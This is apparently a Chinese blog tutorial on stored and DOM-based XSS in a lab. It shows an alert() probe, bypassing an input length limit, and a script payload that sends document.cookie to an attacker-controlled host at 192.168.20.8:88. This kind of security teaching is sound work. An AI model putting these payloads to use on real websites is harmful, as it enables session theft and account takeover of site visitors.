3.存储性XSS漏洞 和MOD型XSS漏洞和

任务100:存储型XSS和BEEF浏览器攻击框架

1.存储性XSS漏洞

  • 存储性XSS漏洞
    叫恶意的脚本代码一次性注入到存在漏洞的页面上,然后有人访问到这个页面客户端的浏览器就会运行恶意的脚本代码。

存储性XSS漏洞会长时间存在服务器端
像留言板留言簿都有可能存在xss漏洞

  1. 检查是否有XSS漏洞
    在这里插入图片描述
    发现没有过滤
    在这里插入图片描述
    弹出窗口js代码
    弹出就有XSS漏洞

    <script>alert('有XSS漏洞')</script>
    

    在这里插入图片描述
    发现执行了
    在这里插入图片描述
    burp看一下源代码
    在这里插入图片描述
    现在这个我注入的脚本代码就已经长期在这个页面上面了每次访问都会出现这个窗口
    每次别人都会自己下载脚本本地浏览器执行
    服务器都已经叫这个恶业代码已经写入数据库了
    在这里插入图片描述

  2. 利用和反射型的一样只是存储型直接访问就运行了,做盗窃Cookie了等等等
    这个利用演示就不演示了看这个就明白了
    1. XSS-简介,反射型、跨站脚本检测和常见的攻击利用手段
    2. XSS- 键盘记录器和反射型XSS

  3. 输入框无视限制
    正常情况下最多输入只能10
    在这里插入图片描述
    输入框无视限制进入在burp就不需要修改限制了应为没有限制
    在浏览器里有限制可以修改的下面演示
    在这里插入图片描述
    点击要修改的输入框,就显示代码了
    在这里插入图片描述
    看限制是10在这里插入图片描述
    改成更大的就可以输入更多的字符了
    在这里插入图片描述

  4. 安全级别
    低安全级别上面演示的就是低安全级别
    是没有进行任何过滤的
    在这里插入图片描述
    中安全级别
    下面是输出<script>就为没有都没有
    在这里插入图片描述
    看一下
    在这里插入图片描述

2.MOD型XSS漏洞

严格来说MOD也算是反射型的

  • MOD就是一个标准的API

    可以用脚本语言js调用API来进行对网页的所有的元素进行任何操作修改,删除,创建

浏览器会给专属于这个页面的Document object(文档对象),这个Document object(围挡对象)下面建立子对象这些子文档对象 这些文档对象都对应这一个元素每个元素都对应这文档对象js脚本就可以进行文档对象进行修改,删除,创建了

MOD漏洞利用

在这里插入图片描述
在有XSS漏洞的网站输入<script>var img=document.createElement("img");img.src="http:// 192.168.20.8:88/log?"+escape(document.cookie);</script>
介绍img等于mod方法标准的api,createElement也就是创建一个元素定义了一个图片对象这个照片在192.168.20.8:88/log里去取照片然后叫自己的cookie发送给黑客
在这里插入图片描述

发布了41 篇原创文章 · 获赞 15 · 访问量 8863

猜你喜欢

转载自blog.csdn.net/qq_41860876/article/details/103647089
今日推荐